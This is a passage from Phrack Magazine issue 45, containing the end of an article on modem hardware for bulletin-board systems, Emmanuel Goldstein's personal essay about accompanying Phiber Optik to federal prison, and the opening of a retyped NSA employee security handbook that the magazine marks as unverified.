\__\/ | | \/ / \|| \| || || \__// ____/_ || | || _|__| | __ || | \\ \ /|: \ \ :| || ______ ~/ |: | |: |_/. \ |_/. \ |: | \ \/ || |\ .| ||_/. \/ . // |__| |________\______\ |__| \____|__| \___|_|______\___ / Dear fellow hacker, Please use YOUR telephone to make long distance calls Using other's systems over the Internet is just NOT fair let alone that is ILLEGAL. Anyway, your hosts computer names/IP addresses and location, as well as accurate logs of most of your recent/6 months unauthorized calls are in file and might be used against you in court. Legal service courtesy of FIRST/CERT sorry if we ruined your day... Connection closed by foreign host. V. Modem Ports =================== Also, every board on x.25 should have a direct modem dialup (and I guess every board does! The dialup for Lutzifer wasn't public, but it had one!) You need to have a modem at least for uucp polling of news and mail. If you are running UNIX, you don't need one of those really expensive 'intelligent' cards like DigiBoard for $1000. But make sure you have a 16550 chip on your I/O controller or you won't be happy. A pretty good deal are AST compatible cards with 4 ports. You can get them for $60 if you are lucky. They just use one IRQ for all 4 ports and let you select the IRQ and the base addresses. This is pretty convenient, because it is even more likely to get an IRQ conflict under UNIX than under DOS. Try to get a card with 16550's on it, or one that has sockets that let you replace the old 16450's or whatever with 16550's, without playing with your soldering iron. If you buy 16550's, try to get the original NS (National Semiconductor) ones: NS16550AFN; Texas Instrument's aren't as good. Then you should get a good serial port driver like the excellent FAS 2.10. It is quite flexible with default drivers for AST compatible and standard I/O cards, supports speeds up to 115,200 bps, and supports both incoming and outgoing calls on the same line very well. It only works with System V though. I can't help smiling when people tell me about their ElEeT WaR3Z boards running on DOS and Novell with a separate PC for each node. With the configuration mentioned above, you can easily have 4 or 8 high speed modems with a host speed of 57.600 connected to a single 386 PC and no performance loss. Email me for information or accounts, or just send me love letters :) sec@g386bsd.first.gmd.de. by Seven Up (damiano @ irc) ==Phrack Magazine== Volume Five, Issue Forty-Five, File 9 of 28 **************************************************************************** No Time For Goodbyes Phiber Optik's Journey to Prison by Emmanuel Goldstein It was almost like looking forward to something. That's the feeling we all had as we started out on Thursday evening, January 6th - one day before Phiber Optik (hereafter called Mark) was to report to federal prison in Schuylkill, Pennsylvania for his undefined part in an undefined conspiracy. We were all hackers of one sort or another and this trip to a prison was actually a sort of adventure for us. We knew Mark's curiosity had been piqued as well, though not to the point of outweighing the dread of the unknown and the emotional drain of losing a year of life with friends, family, and technology. There were five of us who would take the trip down to Philadelphia in a car meant for four - myself, Mark, Walter, Roman, and Rob. The plan was to meet up with 2600 people in Philadelphia on Thursday, drive out to Schuylkill and drop Mark off on Friday, drive back and go to the Philadelphia 2600 meeting, and return later that evening. It sure sounded better than sending him away on a prison bus. Knocking on the door of his family's house in Queens that frigid night, a very weird feeling came over me. How many times had I stood there before to take Mark to a conference, a hacker meeting, a radio show, whatever. Today I was there to separate him from everything he knew. I felt like I had somehow become part of the process, that I was an agent of the government sent there to finish the dirty work that they had begun. It doesn't take a whole lot to join the gestapo, I realized. I talked to Mark's father for the very first time that night. I had chatted with his mother on a number of occasions but never his father before then. He was putting on as brave a front as he could, looking at any glimmer of optimism as the shape reality would take. The prison wouldn't be that bad, he would be treated like a human being, they'd try to visit on the weekends, and anything else that could help make this seem like an extended vacation. As long as he learns to keep his mouth shut and not annoy anyone, he'll be all right. Of course, we both knew full well that Mark's forthright approach *always* managed to annoy somebody, albeit usually only until they got to know him a little. Imagining Mark fading into the background just wasn't something we could do. Everything in Mark's room was neatly arranged and ready to greet him upon his return - his computer, manuals, a videotape of "Monty Python and the Holy Grail" with extra footage that a friend had sent him (I convinced him to let me borrow it), a first edition of "Hackers" that Steven Levy had just given him, and tons of other items that could keep anyone occupied for hours. In fact, he was occupied when I got there - he and Walter were trying to solve a terminal emulation problem. My gestapo duties forced me to get him going. It was getting late and we had to be in Philadelphia at a reasonable time, especially since it was supposed to start snowing at any moment. And so, the final goodbyes were said - Mark's mother was especially worried that he might forget part of his medication or that they'd have difficulty getting him refills. (In fact, everyone involved in his case couldn't understand why Mark's serious health problems had never been mentioned during the whole ordeal or considered during sentencing.) The rest of us waited in the car so he could have some final moments of privacy - and also so we wouldn't have to pretend to smile while watching a family being pulled apart in front of us, all in the name of sending a message to other hackers. Our drive was like almost any other. We talked about the previous night's radio show, argued about software, discussed nuances of Star Trek, and managed to get lost before we even left New York. (Somehow we couldn't figure out how the BQE southbound connected with the Verrazano Bridge which led to an extended stay in Brooklyn.) We talked about ECHO, the system that Mark has been working on over the past year and how, since Wednesday, a couple of dozen users had changed their last names to Optik as a tribute. It meant a lot to him. When you're in a car with five hackers, there's rarely any quiet moments and the time goes by pretty quickly. So we arrived in Philadelphia and (after getting lost again) found our way to South Street and Jim's Cheesesteaks, a place I had always wanted to take Mark to, since he has such an affinity to red meat. Jim's is one of my favorite places in the world and we soon became very comfortable there. We met up with Bernie S. and some of the other Philadelphia hackers and had a great time playing with laptops and scanners while eating cheesesteaks. The people at Jim's were fascinated by us and asked all kinds of questions about computers and things. We've had so many gatherings like this in the past, but it was pretty cool to just pull into a strange city and have it happen again. The karma was good. We wound up back at Bernie S.'s house where we exchanged theories and experiences of our various cable and phone companies, played around with scanners, and just tried to act like everything was as normal as ever. We also went to an all-night supermarket to find Pennsylvania things: TastyKakes, Pennsylvania Dutch pretzels, and pickles that we found out were really from Brooklyn. We managed to confuse the hell out of the bar code reader by passing a copy of 2600 over it - the system hung for at least a minute! It was around five in the morning when one of us finally asked the question: "Just when exactly does Mark have to be at this prison?" We decided to call them right then and there to find out. The person answering the phone was nice enough - she said he had until 11:59 pm before he was considered a fugitive. This was very good news - it meant a few more hours of freedom and Mark was happy that he'd get to go to the Philadelphia meeting after all. As we drifted off to sleep with the sun rising, we tried to outdo each other with trivial information about foreign countries. Mark was particularly good with obscure African nations of years past while I was the only one who knew what had become of Burma. All told, not a bad last day. Prison Day arrived and we all got up at the same moment (2:03 pm) because Bernie S. sounded an airhorn in the living room. Crude, but effective. As we recharged ourselves, it quickly became apparent that this was a very bizarre day. During the overnight, the entire region had been paralyzed by a freak ice storm - something I hadn't seen in 16 years and most of the rest of us had never experienced. We turned on the TV - interstates were closed, power was failing, cars were moving sideways, people were falling down.... This was definitely cool. But what about Mark? How could we get him to prison with roads closed and treacherous conditions everywhere? His prison was about two hours away in the direction of wilderness and mining towns. If the city was paralyzed, the sticks must be amputated entirely! So we called the prison again. Bernie S. did the talking, as he had done the night before. This time, he wound up getting transferred a couple of times. They weren't able to find Mark's name anywhere. But that good fortune didn't last - "Oh yeah, I know who you're talking about," the person on the phone said. Bernie explained the situation to them and said that the State Troopers were telling people not to travel. So what were we to do? "Well," the friendly-sounding voice on the other end said, "just get here when you can get here." We were overjoyed. Yet more freedom for Mark all because of a freak of nature! I told Bernie that he had already been more successful than Mark's lawyer in keeping him out of prison. We spent the afternoon getting ready for the meeting, watching The Weather Channel, and consuming tea and TastyKakes in front of a roaring fire. At one point we turned to a channel that was hawking computer education videos for kids. "These children," the fake schoolteacher was saying with equally fake enthusiasm, "are going to be at such an advantage because they're taking an early interest in computers." "Yeah," we heard Mark say with feigned glee from another room, "they may get to experience *prison* for a year!" It took about 45 minutes to get all of the ice off our cars. Negotiating hills and corners became a matter of great concern. But we made it to the meeting, which took place in the middle of 30th Street Station, where all of the Amtrak trains were two and a half hours late. Because of the weather, attendance was less than usual but the people that showed up were enthusiastic and glad to meet Phiber Optik as he passed by on his way up the river. After the meeting we found a huge tunnel system to explore, complete with steampipes and "Poseidon Adventure" rooms. Everywhere we went, there were corridors leading to new mysteries and strange sights. It was amazing to think that the moment when everybody figured Mark would be in prison, here he was with us wandering around in the bowels of a strange city. The karma was great. But then the real fun began. We decided to head back to South Street to find slow food - in fact, what would probably be Mark's last genuine meal. But Philadelphia was not like New York. When the city is paralyzed, it really is paralyzed. Stores close and people stay home, even on a Friday night. We wanted to take him to a Thai place but both of the ones we knew of were closed. We embarked on a lengthy search by foot for an open food place. The sidewalks and the streets were completely encased in ice. Like drunken sailors in slow motion, we all staggered down the narrow streets, no longer so much concerned with food, but just content to remain upright. People, even dogs, were slipping and falling all around us. We did our best to maintain dignity but hysterical laughter soon took over because the situation was too absurd to believe. Here we were in a strange city, unable to stand upright in a veritable ice palace, trying to figure out a way to get one of our own into a prison. I knew it was going to be a strange trip but this could easily beat any drug. We ate like kings in a Greek place somewhere for a couple of hours, then walked and crawled back to the cars. The plan now was to take Mark to prison on Saturday when hopefully the roads would be passable. Actually, we were all hoping this would go on for a while longer but we knew it had to end at some point. So, after a stop at an all-night supermarket that had no power and was forced to ring up everything by hand, we made it back to Bernie's for what would really be Mark's last free night. It was well after midnight and Mark was now officially late for prison. (Mark has a reputation for being late to things but at least this time the elements could take the blame.) We wound up watching the "Holy Grail" videotape until it was practically light again. One of the last things I remember was hearing Mark say how he wanted to sleep as little as possible so he could be awake and free longer. We left Bernie's late Saturday afternoon. It was sad because the aura had been so positive and now it was definitely ending. We were leaving the warmth of a house with a fireplace and a conversation pit, journeying into the wild and the darkness with wind chill factors well below zero. And this time, we weren't coming back. We took two cars - Bernie and Rob in one; me, Mark, Walter, and Roman in the other. We kept in touch with two way radios which was a very good idea considering the number of wrong turns we always manage to make. We passed through darkened towns and alien landscapes, keeping track of the number of places left to go through. We found a convenience store that had six foot tall beef jerky and Camel Light Wides. Since Mark smokes Camel Lights (he had managed to quit but all of the stress of the past year has gotten him right back into it), and since he had never heard of the wide version, I figured he'd like to compare the two, so I bought him a pack. I never buy cigarettes for anyone because I can't stand them and I think they're death sticks but in this case I knew they'd be therapeutic. As we stood out there in the single digits - him with his Wides, me with my iced tea - he said he could definitely feel more smoke per inch. And, for some reason, I was glad to hear it. Minersville was our final destination but we had one more town to pass through - Frackville. Yeah, no shit. It was the final dose of that magical karma we needed. As we looked down the streets of this tiny town, we tried to find a sign that maybe we could take a picture of, since nobody would ever believe us. We pulled up to a convenience store as two cops were going in. And that's when we realized what we had been sent there to do. Bernie S. went in to talk to the cops and when he came out, he had convinced them to pose with Mark in front of their squad car. (It didn't really take much convincing - they were amazed that anyone would care.) So, if the pictures come out, you can expect to see a shot of Phiber Optik being "arrested" by the Frackville police, all with big smiles on their faces. Frackville, incidentally, has a population of about 5,000 which I'm told is about the distribution of Phrack Magazine. Kinda cosmic. So now there was nothing left to do. We couldn't even get lost - the prison was straight ahead of us. Our long journey was about to come to a close. But it had been incredible from the start; there was no reason to believe the magic would end here. The prison people would be friendly, maybe we'd chat with them for a while. They'd make hot chocolate. All right, maybe not. But everybody would part on good terms. We'd all give Mark a hug. Our sadness would be countered by hope. The compound was huge and brightly lit. We drove through it for miles before reaching the administration building. We assumed this was where Mark should check in so we parked the cars there and took a couple of final videos from our camcorder. Mark was nervous but he was still Mark. "I think the message is 'come here in the summer,'" he said to the camera as we shivered uncontrollably in the biting freeze. As we got to the door of the administration building, we found it to be locked. We started looking for side doors or any other way to get in. "There's not a record of people breaking *into* prison," Bernie wondered out loud. It was still more craziness. Could they actually be closed? I drove down the road to another building and a dead end. Bernie called the prison from his cellular phone. He told them he was in front of the administration building and he wanted to check somebody in. They were very confused and said there was no way he could be there. He insisted he was and told them he was in his car. "You have a *car* phone?" they asked in amazement. When the dust settled, they said to come down to the building at the end of the road where I was already parked. We waited around for a couple of minutes until we saw some movement inside. Then we all got out and started the final steps of our trip. I was the first one to get to the door. A middle-aged bespectacled guy was there. I said hi to him but he said nothing and fixed his gaze on the five other people behind me. "All right, who's from the immediate family?" "None of us are immediate family. We're just--" "Who's the individual reporting in?" "I'm the individual reporting in," Mark said quietly. "The only one I need is just him." The guard asked Mark if he had anything on him worth more than $100. Mark said he didn't. The guard turned to us. "All right, gentlemen. He's ours. Y'all can depart." They pulled him inside and he was gone. No time for goodbyes from any of us - it happened that fast. It wasn't supposed to have been like this; there was so much to convey in those final moments. Mark, we're with you... Hang in there... We'll come and visit.... Just a fucking goodbye for God's sake. It caught us all totally off guard. They were treating him like a maximum security inmate. And they treated us like we were nothing, like we hadn't been through this whole thing together, like we hadn't just embarked on this crazy adventure for the last few days. The karma was gone. From behind the door, a hooded figure appeared holding handcuffs. He looked through the glass at us as we were turning to leave. Suddenly, he opened the outer door and pointed to our camera. "You can't be videotaping the prison here," he said. "All right," I replied, being the closest one to him and the last to start back to the cars. As I turned away, he came forward and said, "We gotta have that film." "But we didn't take any pictures of the prison!" I objected. "We gotta take it anyway," he insisted. We all knew what to do. Giving up the tape would mean losing all recordings of Mark's last days of freedom. The meeting in Philadelphia, slipping down the icy streets, hanging out in Bernie's house, Frackville.... No way. No fucking way. Roman, who had been our cameraman throughout, carefully passed off the camera to Bernie, who quickly got to the front of the group. I stayed behind to continue insisting that we hadn't filmed any part of their precious prison. I didn't even get into the fact that there are no signs up anywhere saying this and that it appeared to me that he was imposing this rule just to be a prick. Not that I would have, since Mark was somewhere inside that building and anything we did could have repercussions for him. Fortunately, the hooded guard appeared to conclude that even if he was able to grab our camera, he'd probably never find the tape. And he never would have. The hooded guard stepped back inside and we went on our way. If it had been dark and cold before, now it was especially so. And we all felt the emptiness that had replaced Mark, who had been an active part of our conversations only a couple of minutes earlier. We fully expected to be stopped or chased at any moment for the "trouble" we had caused. It was a long ride out of the compound. We headed for the nearest major town: Pottsville. There, we went to the only 24 hour anything in miles, a breakfast/burger joint called Coney Island of all things. We just kind of sat there for awhile, not really knowing what to say and feeling like real solid shit. Roman took out the camcorder and started looking through the view screen. "We got it," he said. "We got it all." Looking at the tape, the things that really hit me hard are the happy things. Seeing the cops of Frackville posing and laughing with Mark, only a few minutes before that ugly episode, puts a feeling of lead in my stomach. I'm just glad we gave him a hell of a sendoff; memories of it will give him strength to get through this. What sticks with me the most is the way Mark never changed, right up to the end. He kept his incredible sense of humor, his caustic wit, his curiosity and sense of adventure. And he never stopped being a hacker in the true sense. What would a year of this environment do to such a person? Our long ride back to New York was pretty quiet for the most part. Occasionally we'd talk about what happened and then we'd be alone with our thoughts. My thoughts are disturbing. I know what I saw was wrong. I know one day we'll realize this was a horrible thing to do to somebody in the prime of life. I don't doubt any of that. What I worry about is what the cost will be. What will happen to these bright, enthusiastic, and courageous people I've come to know and love? How many of us will give up and become embittered shells of the full individuals we started out as? Already, I've caught myself muttering aloud several times, something new for me. Mark was not the only one, not by far. But he was a symbol - even the judge told him that at the sentencing. And a message was sent, as our system of justice is so fond of doing. But this time another message was sent - this one from Mark, his friends, and the scores of other hackers who spoke up. Everybody knew this wasn't right. All through this emotional sinkhole, our tears come from sadness and from anger. And, to quote the Clash, "Anger can be power." Now we just have to learn to use it. Mark Abene #32109-054 FPC, Schuylkill Unit 1 PO Box 670 Minersville, PA 17954-0670 [Letters, paperback books, and photos are acceptable. Virtually nothing else is. And remember that everything will be looked at by prison people first.] ==Phrack Magazine== Volume Five, Issue Forty-Five, File 10 of 28 **************************************************************************** [NOTE: This file was retyped from an anonymous photocopied submission. The authenticity of it was not verified.] Security Guidelines This handbook is designed to introduce you to some of the basic security principles and procedures with which all NSA employees must comply. It highlights some of your security responsibilities, and provides guidelines for answering questions you may be asked concerning your association with this Agency. Although you will be busy during the forthcoming weeks learning your job, meeting co-workers, and becoming accustomed to a new work environment, you are urged to become familiar with the security information contained in this handbook. Please note that a listing of telephone numbers is provided at the end of this handbook should you have any questions or concerns. Introduction In joining NSA you have been given an opportunity to participate in the activities of one of the most important intelligence organizations of the United States Government. At the same time, you have also assumed a trust which carries with it a most important individual responsibility--the safeguarding of sensitive information vital to the security of our nation. While it is impossible to estimate in actual dollars and cents the value of the work being conducted by this Agency, the information to which you will have access at NSA is without question critically important to the defense of the United States. Since this information may be useful only if it is kept secret, it requires a very special measure of protection. The specific nature of this protection is set forth in various Agency security regulations and directives. The total NSA Security Program, however, extends beyond these regulations. It is based upon the concept that security begins as a state of mind. The program is designed to develop an appreciation of the need to protect information vital to the national defense, and to foster the development of a level of awareness which will make security more than routine compliance with regulations. At times, security practices and procedures cause personal inconvenience. They take time and effort and on occasion may make it necessary for you to voluntarily forego some of your usual personal perogatives. But your compensation for the inconvenience is the knowledge that the work you are accomplishing at NSA, within a framework of sound security practices, contributes significantly to the defense and continued security of the United States of America. I extend to you my very best wishes as you enter upon your chosen career or assignment with NSA. Philip T. Pease Director of Security INITIAL SECURITY RESPONSIBILITIES Anonymity Perhaps one of the first security practices with which new NSA personnel should become acquainted is the practice of anonymity. In an open society such as ours, this practice is necessary because information which is generally available to the public is available also to hostile intelligence. Therefore, the Agency mission is best accomplished apart from public attention. Basically, anonymity means that NSA personnel are encouraged not to draw attention to themselves nor to their association with this Agency. NSA personnel are also cautioned neither to confirm nor deny any specific questions about NSA activities directed to them by individuals not affiliated with the Agency. The ramifications of the practice of anonymity are rather far reaching, and its success depends on the cooperation of all Agency personnel. Described below you will find some examples of situations that you may encounter concerning your employment and how you should cope with them. Beyond the situations cited, your judgement and discretion will become the deciding factors in how you respond to questions about your employment. Answering Questions About Your Employment Certainly, you may tell your family and friends that you are employed at or assigned to the National Security Agency. There is no valid reason to deny them this information. However, you may not disclose to them any information concerning specific aspects of the Agency's mission, activities, and organization. You should also ask them not to publicize your association with NSA. Should strangers or casual acquaintances question you about your place of employment, an appropriate reply would be that you work for the Department of Defense. If questioned further as to where you are employed within the Department of Defense, you may reply, "NSA." When you inform someone that you work for NSA (or the Department of Defense) you may expect that the next question will be, "What do you do?" It is a good idea to anticipate this question and to formulate an appropriate answer. Do not act mysteriously about your employment, as that would only succeed in drawing more attention to yourself. If you are employed as a secretary, engineer, computer scientist, or in a clerical, administrative, technical, or other capacity identifiable by a general title which in no way indicates how your talents are being applied to the mission of the Agency, it is suggested that you state this general title. If you are employed as a linguist, you may say that you are a linguist, if necessary. However, you should not indicate the specific language(s) with which you are involved. The use of service specialty titles which tend to suggest or reveal the nature of the Agency's mission or specific aspects of their work. These professional titles, such as cryptanalyst, signals collection officer, and intelligence research analyst, if given verbatim to an outsider, would likely generate further questions which may touch upon the classified aspects of your work. Therefore, in conversation with outsiders, it is suggested that such job titles be generalized. For example, you might indicate that you are a "research analyst." You may not, however, discuss the specific nature of your analytic work. Answering Questions About Your Agency Training During your career or assignment at NSA, there is a good chance that you will receive some type of job-related training. In many instances the nature of the training is not classified. However, in some situations the specialized training you receive will relate directly to sensitive Agency functions. In such cases, the nature of this training may not be discussed with persons outside of this Agency. If your training at the Agency includes language training, your explanation for the source of your linguistic knowledge should be that you obtained it while working for the Department of Defense. You Should not draw undue attention to your language abilities, and you may not discuss how you apply your language skill at the Agency. If you are considering part-time employment which requires the use of language or technical skills similar to those required for the performance of your NSA assigned duties, you must report (in advance) the anticipated part-time work through your Staff Security Officer (SSO) to the Office of Security's Clearance Division (M55). Verifying Your Employment On occasion, personnel must provide information concerning their employment to credit institutions in connection with various types of applications for credit. In such situations you may state, if you are a civilian employee, that you are employed by NSA and indicate your pay grade or salary. Once again, generalize your job title. If any further information is desired by persons or firms with whom you may be dealing, instruct them to request such information by correspondence addressed to: Director of Civilian Personnel, National Security Agency, Fort George G. Meade, Maryland 20755-6000. Military personnel should use their support group designator and address when indicating their current assignment. If you contemplate leaving NSA for employment elsewhere, you may be required to submit a resume/job application, or to participate in extensive employment interviews. In such circumstances, you should have your resume reviewed by the Classification Advisory Officer (CAO) assigned to your organization. Your CAO will ensure that any classified operational details of your duties have been excluded and will provide you with an unclassified job description. Should you leave the Agency before preparing such a resume, you may develop one and send it by registered mail to the NSA/CSS Information Policy Division (Q43) for review. Remember, your obligation to protect sensitive Agency information extends beyond your employment at NSA. The Agency And Public News Media From time to time you may find that the agency is the topic of reports or articles appearing in public news media--newspapers, magazines, books, radio and TV. The NSA/CSS Information Policy Division (Q43) represents the Agency in matters involving the press and other media. This office serves at the Agency's official media center and is the Director's liaison office for public relations, both in the community and with other government agencies. The Information Policy Division must approve the release of all information for and about NSA, its mission, activities, and personnel. In order to protect the aspects of Agency operations, NSA personnel must refrain from either confirming or denying any information concerning the Agency or its activities which may appear in the public media. If you are asked about the activities of NSA, the best response is "no comment." You should the notify Q43 of the attempted inquiry. For the most part, public references to NSA are based upon educated guesses. The Agency does not normally make a practice of issuing public statements about its activities. GENERAL RESPONSIBILITIES Espionage And Terrorism During your security indoctrination and throughout your NSA career you will become increasingly aware of the espionage and terrorist threat to the United States. Your vigilance is the best single defense in protecting NSA information, operations, facilities and people. Any information that comes to your attention that suggests to you the existence of, or potential for, espionage or terrorism against the U.S. or its allies must be promptly reported by you to the Office of Security. There should be no doubt in your mind about the reality of the threats. You are now affiliated with the most sensitive agency in government and are expected to exercise vigilance and common sense to protect NSA against these threats. Classification Originators of correspondence, communications, equipment, or documents within the Agency are responsible for ensuring that the proper classification, downgrading information and, when appropriate, proper caveat notations are assigned to such material. (This includes any handwritten notes which contain classified information). The three levels of classification are Confidential, Secret and Top Secret. The NSA Classification Manual should be used as guidance in determining proper classification. If after review of this document you need assistance, contact the Classification Advisory Officer (CAO) assigned to your organization, or the Information Policy Division (Q43). Need-To-Know Classified information is disseminated only on a strict "need-to-know" basis. The "need-to-know" policy means that classified information will be disseminated only to those individuals who, in addition to possessing a proper clearance, have a requirement to know this information in order to perform their official duties (need-to-know). No person is entitled to classified information solely by virtue of office, position, rank, or security clearance. All NSA personnel have the responsibility to assert the "need-to-know" policy as part of their responsibility to protect sensitive information. Determination of "need-to-know" is a supervisory responsibility. This means that if there is any doubt in your mind as to an individual's "need-to-know," you should always check with your supervisor before releasing any classified material under your control. For Official Use Only Separate from classified information is information or material marked "FOR OFFICIAL USE ONLY" (such as this handbook). This designation is used to identify that official information or material which, although unclassified, is exempt from the requirement for public disclosure of information concerning government activities and which, for a significant reason, should not be given general circulation. Each holder of "FOR OFFICAL USE ONLY" (FOUO) information or material is authorized to disclose such information or material to persons in other departments or agencies of the Executive and Judicial branches when it is determined that the information or material is required to carry our a government function. The recipient must be advised that the information or material is not to be disclosed to the general public. Material which bears the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations governing the protection of classified information. The unauthorized disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an unauthorized disclosure of classified defense information. However, Department of Defense and NSA regulations prohibit the unauthorized disclosure of information designated "FOR OFFICIAL USE ONLY." Appropriate administrative action will be taken to determine responsibility and to apply corrective and/or disciplinary measures in cases of unauthorized disclosure of information which bears the "FOR OFFICIAL USE ONLY" caveat. Reasonable care must be exercised in limiting the dissemination of "FOR OFFICIAL USE ONLY" information. While you may take this handbook home for further study, remember that is does contain "FOR OFFICIAL USE ONLY" information which should be protected. Prepublication Review All NSA personnel (employees, military assignees, and contractors) must submit for review any planned articles, books, speeches, resumes, or public statements that may contain classified, classifiable, NSA-derived, or unclassified protected information, e.g., information relating to the organization, mission, functions, or activities of NSA. Your obligation to protect this sensitive information is a lifetime one. Even when you resign, retire, or otherwise end your affiliation with NSA, you must submit this type of material for prepublication review. For additional details, contact the Information Policy Division (Q43) for an explanation of prepublication review procedures. Personnel Security Responsibilities Perhaps you an recall your initial impression upon entering an NSA facility. Like most people, you probably noticed the elaborate physical security safeguards--fences, concrete barriers, Security Protective Officers, identification badges, etc. While these measures provide a substantial degree of protection for the information housed within our buildings, they represent only a portion of the overall Agency security program. In fact, vast amounts of information leave our facilities daily in the minds of NSA personnel, and this is where our greatest vulnerability lies. Experience has indicated that because of the vital information we work with at NSA, Agency personnel may become potential targets for hostile intelligence efforts. Special safeguards are therefore necessary to protect our personnel. Accordingly, the Agency has an extensive personnel security program which establishes internal policies and guidelines governing employee conduct and activities. These policies cover a variety of topics, all of which are designed to protect both you and the sensitive information you will gain through your work at NSA. Association With Foreign Nationals As a member of the U.S. Intelligence Community and by virtue of your access to sensitive information, you are a potential target for hostile intelligence activities carried out by or on behalf of citizens of foreign countries. A policy concerning association with foreign nationals has been established by the Agency to minimize the likelihood that its personnel might become subject to undue influence or duress or targets of hostile activities through foreign relationships. As an NSA affiliate, you are prohibited from initiating or maintaining associations (regardless of the nature and degree) with citizens or officials of communist-controlled, or other countries which pose a significant threat to the security of the United States and its interests. A comprehensive list of these designated countries is available from your Staff Security Officer or the Security Awareness Division. Any contact with citizens of these countries, no matter how brief or seemingly innocuous, must be reported as soon as possible to your Staff Security Officer (SSO). (Individuals designated as Staff Security Officers are assigned to every organization; a listing of Staff Security Officers can be found at the back of this handbook). Additionally, close and continuing associations with any non-U.S. citizens which are characterized by ties of kinship, obligation, or affection are prohibited. A waiver to this policy may be granted only under the most exceptional circumstances when there is a truly compelling need for an individual's services or skills and the security risk is negligible. In particular, a waiver must be granted in advance of a marriage to or cohabitation with a foreign national in order to retain one's access to NSA information. Accordingly, any intent to cohabitate with or marry a non-U.S. citizen must be reported immediately to your Staff Security Officer. If a waiver is granted, future reassignments both at headquarters and overseas may be affected. The marriage or intended marriage of an immediate family member (parents, siblings, children) to a foreign national must also be reported through your SSO to the Clearance Division (M55). Casual social associations with foreign nationals (other than those of the designated countries mentioned above) which arise from normal living and working arrangements in the community usually do not have to be reported. During the course of these casual social associations, you are encouraged to extend the usual social amenities. Do not act mysteriously or draw attention to yourself (and possibly to NSA) by displaying an unusually wary attitude. Naturally, your affiliation with the Agency and the nature of your work should not be discussed. Again, you should be careful not to allow these associations to become close and continuing to the extent that they are characterized by ties of kinship, obligation, or affection. If at any time you feel that a "casual" association is in any way suspicious, you should report this to your Staff Security Officer immediately. Whenever any doubt exists as to whether or not a situation should be reported or made a matter of record, you should decided in favor of reporting it. In this way, the situation can be evaluated on its own merits, and you can be advised as to your future course of action. Correspondence With Foreign Nationals NSA personnel are discouraged from initiating correspondence with individuals who are citizens of foreign countries. Correspondence with citizens of communist-controlled or other designated countries is prohibited. Casual social correspondence, including the "penpal" variety, with other foreign acquaintances is acceptable and need not be reported. If, however, this correspondence should escalate in its frequency or nature, you should report that through your Staff Security Officer to the Clearance Division (M55). Embassy Visits Since a significant percentage of all espionage activity is known to be conducted through foreign embassies, consulates, etc., Agency policy discourages visits to embassies, consulates or other official establishments of a foreign government. Each case, however, must be judged on the circumstances involved. Therefore, if you plan to visit a foreign embassy for any reason (even to obtain a visa), you must consult with, and obtain the prior approval of, your immediate supervisor and the Security Awareness Division (M56). Amateur Radio Activities Amateur radio (ham radio) activities are known to be exploited by hostile intelligence services to identify individuals with access to classified information; therefore, all licensed operators are expected to be familiar with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23 October 1986). The specific limitations on contacts with operators from communist and designated countries are of particular importance. If you are an amateur radio operator you should advise the Security Awareness Division (M56) of your amateur radio activities so that detailed guidance may be furnished to you. Unofficial Foreign Travel In order to further protect sensitive information from possible compromise resulting from terrorism, coercion, interrogation or capture of Agency personnel by hostile nations and/or terrorist groups, the Agency has established certain policies and procedures concerning unofficial foreign travel. All Agency personnel (civilian employees, military assignees, and contractors) who are planning unofficial foreign travel must have that travel approved by submitting a proposed itinerary to the Security Awareness Division (M56) at least 30 working days prior to their planned departure from the United States. Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel Request). This form provides space for noting the countries to be visited, mode of travel, and dates of departure and return. Your immediate supervisor must sign this form to indicate whether or not your proposed travel poses a risk to the sensitive information, activities, or projects of which you may have knowledge due to your current assignment. After your supervisor's assessment is made, this form should be forwarded to the Security Awareness Director (M56). Your itinerary will then be reviewed in light of the existing situation in the country or countries to be visited, and a decision for approval or disapproval will be based on this assessment. The purpose of this policy is to limit the risk of travel to areas of the world where a threat may exist to you and to your knowledge of classified Agency activities. In this context, travel to communist-controlled and other hazardous activity areas is prohibited. A listing of these hazardous activity areas is prohibited. A listing of these hazardous activity areas can be found in Annex A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel" (12 June 1987). From time to time, travel may also be prohibited to certain areas where the threat from hostile intelligence services, terrorism, criminal activity or insurgency poses an unacceptable risk to Agency employees and to the sensitive information they possess. Advance travel deposits made without prior agency approval of the proposed travel may result in financial losses by the employee should the travel be disapproved, so it is important to obtain approval prior to committing yourself financially. Questions regarding which areas of the world currently pose a threat should be directed to the Security Awareness Division (M56). Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not require prior approval, however, this travel must still be reported using Form K2579. Travel to these areas may be reported after the fact. While you do not have to report your foreign travel once you have ended your affiliation with the Agency, you should be aware that the risk incurred in travelling to certain areas, from a personal safety and/or counterintelligence standpoint, remains high. The requirement to protect the classified information to which you have had access is a lifetime obligation. Membership In Organizations Within the United States there are numerous organizations with memberships ranging from a few to tens of thousands. While you may certainly participate in the activities of any reputable organization, membership in any international club or professional organization/activity with foreign members should be reported through your Staff Security Officer to the Clearance Division (M55). In most cases there are no security concerns or threats to our employees or affiliates. However, the Office of Security needs the opportunity to research the organization and to assess any possible risk to you and the information to which you have access. In addition to exercising prudence in your choice of organizational affiliations, you should endeavor to avoid participation in public activities of a conspicuously controversial nature because such activities could focus undesirable attention upon you and the Agency. NSA employees may, however, participate in bona fide public affairs such as local politics, so long as such activities do not violate the provisions of the statutes and regulations which govern the political activities of all federal employees. Additional information may be obtained from your Personnel Representative. Changes In Marital Status/Cohabitation/Names All personnel, either employed by or assigned to NSA, must advise the Office of Security of any changes in their marital status (either marriage or divorce), cohabitation arrangements, or legal name changes. Such changes should be reported by completing NSA Form G1982 (Report of Marriage/Marital Status Change/Name Change), and following the instructions printed on the form. Use And Abuse Of Drugs It is the policy of the National Security Agency to prevent and eliminate the improper use of drugs by Agency employees and other personnel associated with the Agency. The term "drugs" includes all controlled drugs or substances identified and listed in the Controlled Substances Act of 1970, as amended, which includes but is not limited to: narcotics, depressants, stimulants, cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil). The use of illegal drugs or the abuse of prescription drugs by persons employed by, assigned or detailed to the Agency may adversely affect the national security; may have a serious damaging effect on the safety and the safety of others; and may lead to criminal prosecution. Such use of drugs either within or outside Agency controlled facilities is prohibited. Physical Security Policies The physical security program at NSA provides protection for classified material and operations and ensures that only persons authorized access to 